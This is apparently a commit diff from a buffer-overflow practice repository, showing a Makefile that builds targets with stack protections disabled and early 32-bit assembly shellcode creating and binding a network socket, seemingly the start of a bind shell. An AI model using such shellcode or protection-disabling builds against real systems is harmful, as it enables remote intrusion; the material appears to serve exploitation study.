aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--.gitignore1
-rw-r--r--Makefile9
-rw-r--r--shellcode/socket.asm20
3 files changed, 24 insertions, 6 deletions
diff --git a/.gitignore b/.gitignore
index 441caf0..ad10a98 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
+*.o
overflow
overflow_tcp
sc-test
diff --git a/Makefile b/Makefile
index 250d8df..7462d29 100644
--- a/Makefile
+++ b/Makefile
@@ -3,9 +3,10 @@ CC := gcc
STRIP := strip
CFLAGS = -Wall -g
OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector
-TARGETS = $(patsubst %.c,%.o,$(wildcard *.c))
+SOURCES = $(wildcard *.c)
+TARGETS = $(patsubst %.c,%.o,$(SOURCES))
-all: shellcode $(TARGETS) post-build
+all: $(SOURCES) $(TARGETS) shellcode post-build
shellcode:
make -f shellcode/Makefile SUBDIR=shellcode
@@ -28,9 +29,11 @@ disable-prot:
%.o : %.c
$(CC) $(CFLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $<
+ ln -s $< $@
clean:
$(RM) -f $(patsubst %.o,%,$(TARGETS))
+ $(RM) -f $(TARGETS)
make -f shellcode/Makefile SUBDIR=shellcode clean
-.PHONY: shellcode all clean
+.PHONY: shellcode clean
diff --git a/shellcode/socket.asm b/shellcode/socket.asm
index e5b1e9d..731383f 100644
--- a/shellcode/socket.asm
+++ b/shellcode/socket.asm
@@ -1,13 +1,27 @@
BITS 32
-; zero out eax
-xor eax,eax
; socket()
+xor eax,eax ; zero out eax
push eax ; push 0x0 on the stack: arg3(protocol) -> 0
mov ebx,0x01 ; socket sub-syscall: 0x01 -> socket()
push 0x01 ; socket type: 0x01 -> SOCK_STREAM
push 0x02 ; socket domain: 0x02 -> AF_INET
mov ecx,esp ; let ecx point to our structure above
-mov al,102 ; syscall 0x66 (socket())
+mov al,0x66 ; socketcall syscall 0x66
+int 0x80 ; let the kernel do the stuff
+
+; bind()
+mov edx,eax ; move socket descriptor (returned by socket()) to edx
+xor eax,eax ; zero out eax again
+push 0xBBBB ; push ip addr
+push 0x00AA ; push tcp port
+push 0x0002 ; sa_family -> AF_INET = 0x0002
+mov ecx,esp ; save stack pointer -> pointer to sockaddr struct
+push 0x12 ; arg3: socklen -> addrlen
+push ecx ; arg2: push pointer to sockaddr to the stack
+push edx ; arg1: push sockfd
+mov ecx,esp ; move stack pointer to reg (conform to socketcall)
+mov ebx,0x02 ; set socket subcall to 0x03 (bind)
+mov al,0x66 ; socketcall syscall
int 0x80 ; let the kernel do the stuff
Powered by cgit, Themed by Ted Yin.